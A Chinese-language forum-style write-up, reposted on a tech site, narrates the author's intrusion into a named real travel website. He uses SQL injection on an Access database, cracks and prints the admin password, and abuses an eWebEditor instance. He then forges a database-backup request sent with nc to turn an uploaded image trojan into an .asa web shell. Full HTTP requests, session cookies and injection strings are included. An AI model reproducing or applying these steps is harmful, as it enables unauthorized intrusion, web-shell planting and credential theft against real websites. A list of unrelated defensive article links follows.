数据库抓包另类备份的详细方法与解读

所属分类: 网络安全 / 安全设置 阅读数: 107
收藏 0 赞 0 分享
这是我之前在绿色兵团时写的一篇文章,是我自己原创的,思路借鉴了一篇t00ls里的,进行了改进。我在绿色兵团的账号名字也是leisureforest
真实性毋庸置疑,希望给过。thanks
数据库抓包另类备份
地址https://www.jb51.net/(仅用于替代目标网站,非本站)
数据库抓包另类备份
又是旅游网。我刚才发了一篇文章,正想走,外面下雨了。实在是闲的难受。再写这个,提提我人气。
数据库抓包另类备份
这个地址是一个家伙发给我的,他说让我试一试,我随便找了个链接http://www.kmholiday.com/Travel/Travel_line_view.asp?lineid=1030’加了个特殊字符,马上返回错误信息
数据库抓包另类备份
Microsoft JET Database Engine
数据库抓包另类备份
错误'80040e14'
语法错误(操作符丢失) 在查询表达式'id=1030‘' 中。
数据库抓包另类备份
/Travel/Travel_line_view.asp,行 41
数据库抓包另类备份
数据库抓包另类备份
什么意思嘛。这不明摆着让我搞他。access的数据库,直接上语句,and exists(select * from msysobjects)
数据库抓包另类备份
数据库抓包另类备份
Microsoft JET Database Engine
数据库抓包另类备份
错误'80040e09'
数据库抓包另类备份
不能读取记录;在'msysobjects' 上没有读取数据权限。
数据库抓包另类备份
/Travel/Travel_line_view.asp,行41
数据库抓包另类备份
有这个表但是不能访问。好的 接着执行and exists(select * from admin) 正常页面 ;有admin表---- 帅
数据库抓包另类备份
and exists(select count(user) from admin)还是正常页面有user字段
数据库抓包另类备份
and exists(select count(psw from admin) 正常页面,密码字段。
数据库抓包另类备份
用户名aidy 密码28B9E7A5FADBDB964E9069BC82AC2AF9 32位加密的,吓死我了。去MD5搞了下,汗19850311 奶奶的,真唬人。这时我就给那人发信息了,这个也太简单了吧,还高什么,他说,拿到shell才算。好吧接着搞。
数据库抓包另类备份
找后台,这个可真难住我了。先上工具,扫了四万多条愣是没找到。其实这种情况他肯定有个目录很难差,根本不好搞,怎么办,还是google ,用了好几个语句,只找到俩登陆页面但是都不对。还是回到首页看图片,但是右键不能使用,不让查看属性。最后下载的时候从迅雷里看的地址。我真有办法哈哈……
数据库抓包另类备份
找到这个页面了http://www.kmholiday.com/adminsheeninfo/直接跳转登陆。
数据库抓包另类备份
进去之后发现有数据库备份。先找了个上传,上传了个图片木马正当我兴致勃勃地来备份的时候,出问题了,原来备份路径不能修改。也就是说你备份只能备份mdb数据库文件,备份之后的文件名为asa,这个倒是没问题,iis可以解析,关键是路径不让动,这可难死我了,怎么办呢。还是右键查看源码吧。找到了这个链接
数据库抓包另类备份
https://www.jb51.net/ adminsheeninfo/Oledit/ewebeditor/汗,又是编辑器,编辑器啊编辑器,又是你,都不想搞了,进入编辑器,登陆页面也没有删除。现在我写文章的时候被删了,我知道是谁删的(不是我),不截图了。进去还是那个用户名密码。找到样式管理,原来的样式保存按钮被删除了,他以为这样就安全了。那么我copy了一个样式,在新创建的样式里,添加了asp格式。asa.但是都没有成功,其实如果在这里添加aaspsp就可以了,但是我没想到他有这么蠢的漏洞,我就没这么搞。难道我会拿不到shell。不可能。
数据库抓包另类备份
于是我苦思冥想,终于想到了一句话木马。后来一看人家两年前就有人想到这个方法了,就是在添加新闻那里插入一个新闻抓下包,然后改新闻内容为自己的一句话nc提交、如下图
数据库抓包另类备份
抓包内容如下
数据库抓包另类备份
POST /adminsheeninfo/Oledit/Upload.asp?action=remote&type=remote&style=s_light HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/QVOD, application/QVOD, */*
Referer: http://www.kmholiday.com/adminsh ... s&style=s_light
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.kmholiday.com
Content-Length: 33
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: cck_lasttime=1312255680031; cck_count=0; ASPSESSIONIDSQQSDTTT=PNFACNHDBNBMAFNBNHHHBFCP
数据库抓包另类备份
eWebEditor_UploadText=ggggggggggg看到最后这里没有只抓到了内容没抓到路径,也就是说没法访问一句话,白玩了。
数据库抓包另类备份
看来这个还真不好搞。这时我想还是得用那个后台的备份,其实既然这里可以抓包后台那里也可以抓包的,说干就干。
数据库抓包另类备份
我点击后台数据库备份,抓到的内容如下
数据库抓包另类备份
POST /adminsheeninfo/DB_Manage.asp?action=BackupData&act=Backup HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/QVOD, application/QVOD, */*
Referer: http://www.kmholiday.com/adminsh ... p?action=BackupData
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.kmholiday.com
Content-Length: 162
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: cck_lasttime=1312255680031; cck_count=0; ASPSESSIONIDSQQSDTTT=PNFACNHDBNBMAFNBNHHHBFCP
数据库抓包另类备份
DBpath=%2Fadminsheeninfo%2Fdb%2Fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb&bkfolder=..%2F..%2Fdatabase%2FDataBackup%2F&bkDBname=DB_BAK_20110802_1201247.asa&bknotes=
数据库抓包另类备份
大家看到最后这个链接没有,这个事什么意思呢,分析下先。DBpath=%2Fadminsheeninfo%2Fdb%2Fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb这个是原来的数据库名称,%23是空格,%2f是/的编码,转换之后就是/adminsheeninfo/db/web_date_#_sheenzhaoghsy&#@!.mdb备份后的数据库名称就是=..%2F..%2Fdatabase%2FDataBackup%2F&bkDBname我们要修改原来的数据库名称为自己上传的图片马,随便一个吧,比如2011-8-2 12:07:04.jpg,我随便写的,吧原数据库路径改成这个,然后数出来原来的数据库路径的字符长度,比如是162(假设)我不数了,我记得当时数的是153,图片是64,然后用153-64=89那么就把原来的Content-Length: 162修改为89,然后用保存为qq.txt,文件名随便起。保存为txt文档。复制到c盘根目录下面
数据库抓包另类备份
用nc上传(nc也要放到c盘根目录)
数据库抓包另类备份
命令nc www.kmholiday.com 80<qq.txt。上传之后就会返回上传成功的提示。如下
数据库抓包另类备份
%2Fadminsheeninfo%2FOledit%2FUploadFile%2F2011730232015138.jpg 62
已经成功备份,你的数据库的路径:\hosting\wwwroot\kmholiday_cn\htdocs\adminsh eeninfo\../../database/DataBackup/\DB_BAK_20110730_231235.asa返回...
database/DataBackup/\DB_BAK_20110730_231235.asa
数据库抓包另类备份
这个就是备份之后的Asp马地址D:\hosting\wwwroot\kmholiday_cn\htdocs\adminsh eeninfo\../../database/DataBackup/\DB_BAK_20110730_231235.asa用侠客客服端连接一下就可以了,然后上传自己的asp MM,访问,我没再截图,这样不好你懂的。
数据库抓包另类备份
好啦,看来看似简单的东西并不是那么容易得到,切莫眼高收低,像我一样,踏踏实实做事还是好些。
数据库抓包另类备份
更多精彩内容其他人还在看

三年不重装 令Windows百毒不侵13妙招

前几天我朋友的电脑中了病毒,病毒感染了很多EXE文件,修复难度很大,无奈只好格式化掉,损失惨重。
收藏 0 赞 0 分享

加强企业Linux系统安全的若干方法

世界上没有绝对安全的系统,即使是普遍认为稳定的Linux系统,在管理和安全方面也存在不足之处。我们期望让系统尽量在承担低风险的情况下工作,这就要加强对系统安全的管理。
收藏 0 赞 0 分享

远程软件盗窃硬盘数据的3种防止方法

很多时候当一台计算机中毒以后,我们的远控软件就会查看到你硬盘的重要数据,从而将之盗取.
收藏 0 赞 0 分享

U盘病毒彻底防御办法

如何让U盘做到100%预防病毒。
收藏 0 赞 0 分享

Google 搜索时出现的G.cn渐隐广告的解决方法

今天到软件园下载了一个游戏,安装后发现了,用google搜索时出现g.cn的渐隐的广告,原来时这个垃圾软件的问题,国内的大软件网站也提供带插件的广告了。
收藏 0 赞 0 分享

流氓软件篡改ie主页伎俩分析

经常有朋友在安装某种小软件后,IE主页被篡改,而你在ie选项里改回来后,再打开又时主页又变成了另外一个网址。
收藏 0 赞 0 分享

15步安全强化win2003服务器

我们现在就来看看Jonathan的15个步骤以及他提到的一些要点。
收藏 0 赞 0 分享

曲折的FileZilla Server提权之路

明白以上三点后现在就是尝试如何连接到服务器上的FileZilla Server。首先查看FileZilla Server Interface.xml中的内容
收藏 0 赞 0 分享

在 Windows 下关闭135/139/445端口的图文方法

在 Windows 下关闭135/139/445端口的方法,一切为了安全
收藏 0 赞 0 分享

IIS的FastCGI漏洞处理方法

这篇文章主要介绍了IIS的FastCGI漏洞处理方法,需要的朋友可以参考下
收藏 0 赞 0 分享
查看更多